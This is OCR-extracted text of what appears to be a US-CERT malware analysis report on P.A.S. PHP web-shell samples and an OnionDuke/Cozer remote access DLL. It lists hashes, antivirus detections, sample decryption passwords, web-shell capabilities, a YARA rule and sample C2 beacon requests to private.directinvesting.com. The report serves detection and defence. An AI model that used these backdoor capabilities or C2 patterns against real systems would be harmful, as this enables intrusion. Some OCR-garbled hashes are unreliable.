Backdoor. PH P.Agent.aaw 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Avira 

PH P/Agent. 12662 

Microsoft 

BackdoonPHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Relationships 



(F) 


(F) 

20f76ada 1721 b61963fa595e3a2006c962253513 
62b79d5d719197c190cd4239 (c3e23) 

Related_To 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Description 




This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf 

Details 
Name 
Size 
Type 
MD5 
SHA1 
ssdeep 
Entropy 

Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PHP. AYP 

VirIT 

Trojan.PHP.Shell.JB 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.abc 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 


7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf 

21633 

PHP script, ASCII text, with very long lines, with CRLF line terminators 
38f7149d4ec01509c3a36d4567125b18 
d 1828dce4bf476ca07629e1613dd77c3346e2c5a 

384:0y6t/9+e9BhShtzX3vOjbkMlspeMucuA4ScHCpMO1LmMoVID+a5XHEuz8v:0y6L+4BlhhX/6IMyn5uMcHCpbkuz8v 

6.12095270355 
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Avira 

Microsoft 

Ahnlab 


PHP/Agent.1266 

Backdoor:PHP/Fobushell.D 

PHP/Webshell 


ESET 

TrendMicroHouseCall 

Ikarus 


PHP/Agent.lB trojan 
PHP_WEBSHELL.SMA 
Trojan.PHP.Crypt 


Relationships 



(F) 


(F) 

7b28b9b85f9943342787bae1c92cab39c01f9d82b 
99eb8628abc638afd9eddaf (38f71) 

Related_To 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Description 




This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


ae67c121 c7b81638a7cb655864d574f8a9e55e66bcb9a7b01 f0719a05fab7975 


Details 

Name ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 
Size 21121 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines, with no line terminators 

eddfel 10da553a3dc721 e0ad4ea1c95c 

6b178cc9d630345356b9341613cd83bd588192e9 

384:/YO/kOzhJ38bvqoWksNj4ICKIml6KDzXpofabpTACAXDDe9GDtWNmu:/YlkOzhJs1WkqlCKsOofocCAXDDe9etO 

6.08010194218 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PHP. AYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-1642041 

Kaspersky 

Backdoor. PHP. Agent.aat 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

Backdoor:PHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Relationships 



(F) 


(F) 

ae67c121c7b81638a7cb655864d574f8a9e55e66 
bcb9a7b01 f0719a05fab7975 (eddfe) 

Related_To 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Description 




This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 


Details 

Name 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 
Size 21191 


Type PHP script, ASCII text, with very long lines 
MD5 78abd4cdccab5462a64ab4908b6056bd 
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SHA1 

ssdeep 

Entropy 


1a42bc32bdfeb468e6a98f9b69514adb7cc963ae 

384:3cKqZSUbR58RkpmzijNeoBtqT/juu+/iSeCIJTYZaPKWFbNx:sKqZ7dCupmzqN3K7jsFDTTeaX1Nx 

6.10207869759 


Antivirus 

F-prot 

McAfee 

F-secure 

Symantec 

ClamAV 

Kaspersky 

TrendMicro 

Sophos 

Microsoft 

ESET 


TrendMicroHouseCall 

Ikarus 


PHP/WebShell.A 

PHP/WebShell.i 

Backdoor. PH PAYP 

PHP.Backdoor.Trojan 

Php.Malware.Agent-5486261-0 

Backdoor. PH P.Agent.abe 

PHP_WEBSHELL.SMA 

PHP/WebSheil-O 

Backdoor:PHP/Fobushell.G 

PHP/Krypt k.AJ trojan 

PHP_WEBSHELL.SMA 

Trojan.PHP.Crypt 


Relationships 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 Related_To 

94e3e6e358c994500fcce46 (78abd) 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 Related_To 

94e3e6e358c994500fcce46 (78abd) 


(S) Interface for PAS v.3.0.10 

(F) 

d285115e97c02063836f1 cf8f91669c114052727c3 
9bf4bd3c062ad5b3509e38 (fc45a) 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "we kome" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.0.10. This version (see Screenshot) and v.3.1.0 have similar functionality, except v.3.0.10 has safeMode, open base directory, and 
disable functionality.The webshell P.A.S. v.3.0.10 interface is shown in image 2.0. 

Screenshots 


• Interface for PAS v.3.0.10 



d285115e97c02063836f 1 cf8f91669c114052727c39bf4bd3c062ad5b3509e38 


Details 

Name d285115e97c02063836f1 cf8f91669c114052727c39bf4bd3c062ad5b3509e38 
Size 21191 


Type 

MD5 

SHA1 


PHP script, ASCII text, with very long lines 
fc45abdd5fb3ffa4d3799737b3f597f4 
adf649354ff4d 1812e7de745214362959e0174b 1 


ssdeep 384:ccKqZSUbR58RkpmzijNeoBtqT/juu+/iSeCIJTYZaPKWFbNUbxwx:pKqZ7dCupmzqN3K7jsFDTTeaX1NUbxG 
Entropy 6.1021796546 


Antivirus 

F-prot PHP/WebShell.A 
McAfee PHP/WebSheil.i 
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NetGate 

Trojan. Win32. Malware 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PH P.Agent.abe 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Avira 

PHP/Krypt k.AA 

Microsoft 

BackdoonPHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Relationships 



(F) 


(F) 

d285115e97c02063836f1 cf8f91669c114052727c3 
9bf4bd3c062ad5b3509e38 (fc45a) 

Related_To 

6fad670ac8febb5909be73c9f6b428179c6a7e942 
94e3e6e358c994500fcce46 (78abd) 

Description 




This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.0.10. This file and 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 have the same functionality. 


0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811 bb09d328d71 b36faa09 


Details 

Name 0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811 bb09d328d71 b36faa09 
Size 21633 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines, with CRLF line terminators 
10bi 306f322a590b9cef4d023854b850 
eac98f414abd9e6a39ce96f5547284c371a30a74 

384:aflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdL1v:afUAr6OJB18Cc3u2jseTo/cGA3taD+Ae 

6.1212580823 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aax 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

Backdoor:PHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e 

Details 

Name 0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e 
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Size 


21377 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
128cc715b25d0e55704ed9b4a3f2ef55 
93c3607147e24396cc8f508c21 ce8ab53f9a0176 

384:zvAz7TvcjKJp0eJ4ZZXIoQW9fq3C3W/e3+M/BF9xjzAMbaQCUv:jAzMjAp0/Xlq9fq3CWoEUv 

6.10186106747 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PHP.AXV 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aau 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

BackdoonPHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


1343c905a9c8b0360c0665efa6af588161 fda76b9d09682aaf585df 1851 ca751 


Details 

Name 1343c905a9c8b0360c0665efa6af588161 fda76b9d09682aaf585df1851 ca751 
Size 21355 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
f3ecf4c56f16d57b260b9cf6ec4519d6 
18eda2d7b0d42462cdef1794ad26e21a52d79dc6 

384:DliH2ER39l1Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUV:Dly2ER3CL+khWUYcsJtMcDiuSA93Dux0 

6.09871136883 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PH P.Agent.aav 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

BackdoonPHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 
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2d5afec034705d2dc398f01 cl 00636d51 eb446f459f 1C2602512fd26e86368e4 


Details 

Name 2d5afec034705d2dc398f01 cl 00636d51 eb446f459f1 C2602512fd26e86368e4 
Size 21377 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
7fce89d5e3d59d8e849d55d604b70a6f 
a0a6978f7022f71 ad977760f492704216318b5cd 

384:Zo01rROapTrdj4hK2leJYORHxrPIHzDUCuJYL3Q3QX6imKrV3XVPeezCv:ZR1rxlOk2IJYORRyBg3XIKpnVPee+v 

6.10129283354 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PHP.AYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.abb 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

BackdoonPHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. During 
runtime, this payload will be decoded and decrypted using combination of a base64_decode and a password. This password is submitted via 
a POST request or in a cookie at runtime. The following password "|F3Jk~6k6" was used to decrypt the payload. The decrypted payload 
contains a PHP webshell and has been identified as P.A.S. v.3.1.0. This webshell is a backdoor that provides an interface for various remote 
operations, such as file explorer, searcher, SQL-client, network tools, command shell access, and server info features to a remote user once 
installed on the compromised system. The following are some of the P.A.S webshell capabilities: 

-Begin Capabilities- 

To view compromised server information. 

File manager (copy, rename, move, download, upload, delete, jump, create files and folders). 

Search files, objects, directories, and text in files. 

SQL client to login and dump database and tables. 

Network console to bindport, back-connect, and port scanner. 

Command line console to execute command. 

Execute PHP code. 

-End Capabilities- 

The webshell interface is shown in image 1.0. 


3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71 b2a85b8169d7 


Details 

Name 3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7 
Size 21612 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines, with CRLF line terminators 
e80f92faa5e11007f9ffea6df2297993 
2c48e42c882b45861557ea 1 fl 39f3e8b31629c7c 

384:FflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdLh:FfUAr6OJB18Cc3u2jseTo/cGA3taD+Aq 

6.11927531623 


Antivirus 


F-prot 

McAfee 

F-secure 

Symantec 


PHP/WebShell.A 
PHP/WebShell.i 
Backdoor. PHP.AYP 
PHP.Backdoor.Trojan 
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ClamAV 

Kaspersky 

TrendMicro 

Sophos 

Microsoft 

Ahnlab 


Php.Malware.Agent-5486261-0 

Backdoor. PHP.Agent.aas 

PHP_WEBSHELL.SMA 

PHP/WebShell-O 

Backdoor:PHP/Fobushell.G 

PHP/Webshell 


ESET 

TrendMicroHouseCall 

Ikarus 


PHP/Krypt k.AJ trojan 
PHP_WEBSHELL.SMA 
Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload.Analysis indicates that the web shell will be access and 
execute through a browser by a remote user. The file will prompt the user to enter a password. The password entered is submitted via 
$_POST and stored in a cookie at runtime. The embedded payload will be decoded and decrypted using combination of a base64_decode 
and a password. The password was not part of the submission. 


449e7a7cbc393ae353e8e18b5c31dl7bb13235d0c07e9e319137543608749602 


Details 

Name 

Size 

Type 

MD5 

SHA1 


449e7a7cbc393ae353e8e18b5c31 dl7bb13235d0c07e9e319137543608749602 
21667 

PHP script, ASCII text, with very long lines 
66948b04173b523ca773c3073afb506d 
e1ad80b0769b8b9dfb357a410af948127aabda97 


SSdeep 384:C0LnByNA3w1C7+mUsR+3oGzY0esuvDDqpEhlqdbf1oZP4jihXro8AtoGXz:C0FgJXoGzY0mDDblqNYP4jihXroltoGj 
Entropy 6.09992131729 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH P.AYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aap 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Avira 

PH P/Agent. 12664 

Microsoft 

BackdoonPHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


7dac01 e818bd5a01 fe75c3324f6250e3f51977111 d7b4a94e41307bf463f 122e 


Details 

Name 7dac01 e818bd5a01 fe75c3324f6250e3f51977111 d7b4a94e41307bf463f122e 
Size 21445 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines, with CRLF line terminators 
a5e933d849367d623d 1 f2692b6691 bbf 
b788dce411fe0e1e1b7b476184aa6bbd0f8e3e31 

384:5WermnyinsjQ+b3f+qzolbopGdiWy6diduFrg:5XaytEm3GCpGdMuFrg 

6.11582358023 
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Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aaq 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Avira 

PH P/Agent. 12661 

Microsoft 

BackdoonPHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f 


Details 

Name 9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f 
Size 21182 


Type PHP script, ASCII text, with very long lines 
MD5 dc4594dbeafbc8edfa0ac5983b295d9b 


SHA1 

ssdeep 

Entropy 


82c4d3753a8ee26f0468e79bf5d90ada04c612ea 

384:5e0nReo3P8WiT/7AxG7+4g6NdSB1env3qnEkgAFHJNdfoNuWs3yYKGYWZ0QxzTFI:5Rzl 

/sxG7+762Be0skJNdfoNuWVbWZ0V 

6.10088739359 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.abd 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

Backdoor:PHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806 

Details 

Name a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806 
Size 21191 
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Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
1 ec7f06f1 ee4fa7cecd17244eec24e07 
ae167bca0863cfccba9cc9cf5e3cafce6fa6b92c 

384:s7ueraQSysFXnTPy9U3KRpzOx8Q1wKM5ivFV8rfAcrOf+U8zVYG:32sFXTPy9U3Qze8SwK2iooEOmKG 

6.1011365049 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aba 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

BackdoonPHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


bd7996752cac5d05ed9d1 d4077ddf3abcb3d291321 c274dbcf10600ab45ad4e4 


Details 

Name bd7996752cac5d05ed9d1 d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4 
Size 21377 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
70f93f4f17d0e46137718fe59591 dafb 
1 e49a68c72ef40e8c333007a7e7f56de1 b29c842 

384:ENH2ER39I1 Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUort:Ely2ER3CL+khWUYcsJtMcDiuSA93Duxf 
6.09482710893 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

VirIT 

Trojan.PHP.Shell.LV 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PH P.Agent.aaw 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

Backdoor:PHP/Fobushell.G 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Krypt k.AJ trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 
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55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 


Details 


Name 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 
Size 435712 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 
8f 154d23a c2071 d7f179959aa ba37ad5 
8ccaa941af229cf57a0a97327d99a46f989423f0 

6144:khqxVdwaTzQ87IWjZA1azReeoqbRAnXccmGRAVckV2pfLHWiDlu:2qq+t74ak2tAscmPckV2pfLHWulu 

6.40456212225 


Antivirus 

F-prot 

McAfee 

K7 

Systweak 

F-secure 

Symantec 

ClamAV 

Kaspersky 

QuickHeal 

TrendMicro 

Sophos 

Avira 

Microsoft 

Ahnlab 

ESET 

NANOAV 

TrendMicroHouseCall 

Ikarus 

AVG 


W32/Trojan3.XZP 
OnionDuke-FDMS 
Trojan (0007c0301 ) 
trojan.agent 

Trojan.Generic.20173242 
Trojan. Cozer.B 

Win.Trojan.OnionDuke-5486244-O 

Backdoor. Win32.MiniDuke.bz 

Backdoor.OnionDuke 

BKDR_COZER LP 

T roj/Agent-AU WH 

TR/AD.OnionDuke.ntjop 

Backdoor:Win32/OnionDukeldha 

Malware/Win32.Generic 

a variant of Win32/Agent.WPL trojan 

Trojan.Win32.MiniDuke.ekecow 

BKDR_COZER.LP 

Trojan.Win32.Agent 

Agent5.AWKU 


PE Information 


PE Sections 


Compiled 

2014-12-18T21:40:51Z 



Name 

MD5 

Raw Size 

Entropy 

(header) 

d16ea137e45c3186e912c69ef544df30 

1024 

2.47959457145 

text 

d3be0c71767bb8f7976fb66e2d3b6611 

338432 

6.44965994232 

rdata 

be8b2bc2020e9e8b5142b2231f2e028c 

68608 

4.7082956177 

data 

f8d519621401 eb9057c8ed71 bb5902bc 

8192 

5.27710543994 

reloc 

24a204634cd51c19590a4e0eac7ab8fe 

19456 

6.54348162441 

Packers 




Name 

Version Entry Point 




Borland Delphi 3.0 (???) NA NA 

Relationships 

(F) 

55058d3427ce932d8efcbe54dccf97c9a8d1e85c7 Connected_To (D) private.directinvesting.com 
67814e34f4b2b6a6b305641 (8f154) 

Description 

This file is a Windows DLL application. It has been identified as a fully functioning remote access tool providing a vast array of command and 
control capabilities. This program uses a secure strings method to unpack strings used during runtime by multiple portions of the application. 
Displayed below is a YARA signature which may be used to detect this application. This YARA signature is based primarily on the identified 
secure strings method 

—Begin YARA Signature— 
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rule unidentified_malware 

{ 

meta: 

Author = "US-CERT Code Analysis Team" 

Date = 16JAN17 
Incident = 10105049 

MD5 = "8F154D23AC2071D7F179959AABA37AD5" 
strings: 

$my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 OF 32 C4 88 04 11 41 3B CE 72 F3 } 

$my_string_t w o = "CryptAcquireCertificatePrivateKey" 

$my_string_three = "CertFreeCertificateContext" 

$my_string_four = "CertEnumCertificatesinStore" 

$my_string_five = "PFXImportCertStore" 

condition: 
all of them 
} 

—End YARA Signature— 

During runtime, the malware attempts to communicate with its C2 server, private.directinvesting.com. Displayed below are sample 
connections between the malware and its C2 server. 

—Begin Sample C2 Connections— 

GET /lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 


GET /lexicon/index.cfm?source=0887a&css=b9&utm_term=80aaeb73d479e66c6&f=12 HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 


GET /lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 


—End Sample C2 Connections— 

The application attempts to download data from a C2 server and write it to a randomly named .tmp file within the users %TEMP% directory. 
Some of the file names used to store this downloaded data within our lab environment are displayed below: 

—Begin Sample File Names— 

TEMP\Cab1 D5.tmp 
TEMP\Cab1 D7.tmp 
TEMP\Cab1 DA.tmp 
TEMP\Cab1 DC.tmp 

—End Sample File Names— 

Analysis indicates this application provides several notable capabilities to an operator. The program provides an operator access to a 
reverse shell on the victim system. Additionally, the malware provides an operator the capability to enumerate the victims Windows 
Certificate Store, and extract identified digital certificates, including private keys. The application also allows an operator to enumerate all 
physical drives and network resources the victim system has access to. 
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9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 


Details 


Name 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 
Size 434688 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 
ae7e3e531494b201 f bf6021066ddd 188 
e9fb290ab3a57dd50f78596b3bb3d373f4391794 

6144:OTnkkw+XyCBoxqNyK1flVldm4EGJAAyom6YAhaf7iBXBj12SHWM7Dx:OTn3C3xqXf/OAZom6jhQiBXBZ2SHWOx 

6.4095074296 


Antivirus 


F-prot 

W32/Trojan3.XZO 

McAfee 

OnionDuke-FDMS 

K7 

Trojan (0007c0301 ) 

Sys tweak 

trojan.agent 

F-secure 

Trojan.Generic 20173160 

Symantec 

Trojan.Cozer.B 

ClamAV 

Win.Trojan.OnionDuke-5486245-O 

Kaspersky 

Backdoor. Win32.MiniDuke.cb 

QuickHeai 

Backdoor. OnionDuke 

TrendMicro 

BKDR_COZER.LP 

Sophos 

Troj/Agent-AUWH 

Avira 

TR/AD.OnionDuke.trltr 

Microsoft 

Backdoor:Win32/OnionDuke!dha 

Ahniab 

Malware/Win32.Generic 

ESET 

a variant of Win32/Agent.WPL trojan 

NANOAV 

Trojan. Win32. AD ekdqnf 

TrendMicroHouseCall 

BKDR_COZER.LP 

Ikarus 

Trojan.Win32. Agent 

AVG 

Agent5.AWKV 


PE Information 


